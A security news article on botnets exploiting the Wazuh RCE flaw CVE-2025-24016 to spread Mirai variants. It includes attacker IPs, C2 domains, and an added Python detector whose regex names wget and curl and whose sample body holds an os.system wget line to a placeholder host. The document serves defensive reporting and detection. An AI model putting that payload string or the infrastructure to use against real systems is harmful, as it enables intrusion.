Mirai Variants Deployed Through Exploited Critical RCE Flaw in Wazuh Server

The Akamai Security Intelligence and Response Team (SIRT) has uncovered large-scale, active exploitation of the critical remote code execution (RCE) vulnerability CVE-2025-24016 (CVSS 9.9), specifically targeting Wazuh servers.

This flaw, present in Wazuh versions 4.4.0 through 4.9.0 and patched in 4.9.1, enables remote attackers with API access to execute arbitrary code via unsanitized JSON dictionaries in DistributedAPI (DAPI) requests.

The exploitation enables adversaries to upload malicious payloads, giving them direct execution control with minimal authentication barriers.

Attack Mechanics

Following the disclosure of CVE-2025-24016 in February 2025, Akamai’s global honeynet detected the first exploitation attempts in March, marking an alarmingly short time-to-exploit.

The attack chain largely follows techniques outlined in proof-of-concept (PoC) code, in which attackers craft DAPI requests to endpoints such as /security/user/authenticate/run_as, embedding payloads that abuse the server's unsafe deserialization of the request dictionary to reach system-level command execution.

Typical exploitation involves the use of a Base64-encoded authorization header and a JSON object that forces Python’s os.system to download and execute remote shell scripts, commonly invoking wget or curl to fetch malware.
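As an added example (not code from the article, Akamai or the Wazuh project), a small Python detector for the request pattern described above: it flags run_as requests whose JSON carries the os.system, wget or curl strings the article associates with the payloads, records which API account the Basic auth header was for, and checks whether a server version falls in the affected range. The sample request at the bottom is constructed, not a real capture, and is not a working exploit.

```python
import base64
import json
import re
# Affected Wazuh versions per the article: 4.4.0 through 4.9.0, fixed in 4.9.1.
VULN_MIN, FIXED = (4, 4, 0), (4, 9, 1)
# DAPI endpoint the article names as the target of PoC-derived requests.
RUN_AS_PATH = "/security/user/authenticate/run_as"
# Payload traits the article describes: os.system plus wget/curl fetching a shell script.
SUSPICIOUS = re.compile(r"os\.system|\b(?:wget|curl)\b|/bin/sh|\bsh\s+-c\b", re.I)

def is_vulnerable_version(version):
    """True when a Wazuh server version falls inside the affected range."""
    return VULN_MIN <= tuple(int(p) for p in version.split(".")) < FIXED

def _strings(obj):
    """Yield every key and string value anywhere in a nested JSON structure."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for key, value in obj.items():
            yield key
            yield from _strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _strings(value)

def basic_auth_user(header):
    """Username from a 'Basic <base64>' header (which API account was used), or None."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        return base64.b64decode(token, validate=True).decode().split(":", 1)[0]
    except (ValueError, UnicodeDecodeError):  # malformed base64 or non-text credentials
        return None

def inspect_request(path, authorization, body):
    """Flag a run_as request whose JSON carries shell-download strings; None if clean."""
    if path.split("?", 1)[0] != RUN_AS_PATH:
        return None
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None  # not JSON, so not the DAPI dictionary abuse described
    hits = [s for s in _strings(data) if SUSPICIOUS.search(s)]
    return {"user": basic_auth_user(authorization), "matched": hits} if hits else None

# Constructed sample (not a real capture or a working exploit), shaped after the article's description.
SAMPLE_AUTH = "Basic " + base64.b64encode(b"api-user:placeholder").decode()
SAMPLE_BODY = json.dumps({"user": "x", "note": "os.system('wget http://example.invalid/x.sh')"})
```

Feed real API access-log entries through inspect_request and alert on any non-None result; the version check is the first thing to run against an inventory of Wazuh managers.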

Akamai has identified two distinct botnet campaigns leveraging this vulnerability. The first campaign deploys multiple Mirai variants (notably “morte” and LZRD-based strains) as architecture-specific binaries to maximize propagation across IoT devices.

The initial infection vector downloads a shell script from infrastructure such as 176.65.134.62, which in turn retrieves various Mirai payloads targeting platforms including ARM, MIPS, x86, PPC, and others.

Network telemetry tied to this Mirai campaign reveals links to several dynamic C2 domains (nuklearcnc.duckdns[.]org, cbot.galaxias[.]cc, and more), with threat actors using dynamic DNS and rapidly shifting infrastructure to evade basic blacklists.

Malware samples are easily identified by unique console output strings such as “lzrd here” or by comparison with code signatures from earlier Mirai variants.

Resbot/Resentual Botnet

A second campaign, dubbed Resbot or Resentual, emerged in May 2025, deploying a new Mirai variant labeled “resgod.”

This campaign differs in its operational details, using domains with Italian linguistic patterns (e.g., gestisciweb.com), suggesting either a geographic focus or a social engineering angle targeting Italian-speaking administrators.

The Resbot botnet is reported to spread quickly via telnet and FTP and uses hardcoded C2 callbacks to IPs such as 104.168.101.27.

Both botnets expanded their reach by simultaneously exploiting other known device vulnerabilities, including CVE-2023-1389 (TP-Link Archer AX21), CVE-2017-17215 (Huawei HG532), and CVE-2017-18368 (ZyXEL routers), among others.

These campaigns underscore the critical need for immediate patching of Wazuh servers to version 4.9.1 or later.

The exploitation of this RCE is not limited to theoretical risk—botnet operators are acting with speed and coordination, often adapting PoC code into live attacks within days of public release.

Organizations running outdated Wazuh deployments are advised to prioritize remediation, implement network detection rules for known C2 infrastructure, and proactively monitor for IoCs outlined below.

Key Indicators of Compromise (IOCs)


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
